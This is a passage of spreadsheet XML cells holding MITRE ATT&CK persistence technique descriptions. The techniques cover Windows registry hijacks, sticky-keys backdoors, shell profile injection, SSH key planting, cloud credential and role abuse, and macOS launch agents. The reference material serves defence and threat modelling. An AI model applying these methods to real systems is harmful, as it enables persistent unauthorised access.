Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.
For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 
For example, the &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) 
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.  
Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based  role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in AWS environments, an adversary with appropriate permissions may be able to use the &lt;code&gt;CreatePolicyVersion&lt;/code&gt; API to define a new version of an IAM policy or the &lt;code&gt;AttachUserPolicy&lt;/code&gt; API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the &lt;code&gt;CreateAccessKey&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud iam service-accounts keys create&lt;/code&gt; command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) 
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.</t>
  </si>
  <si>
    <t>Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.</t>
  </si>
  <si>
    <t>Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) 
Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
 Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) </t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)
Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.
Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
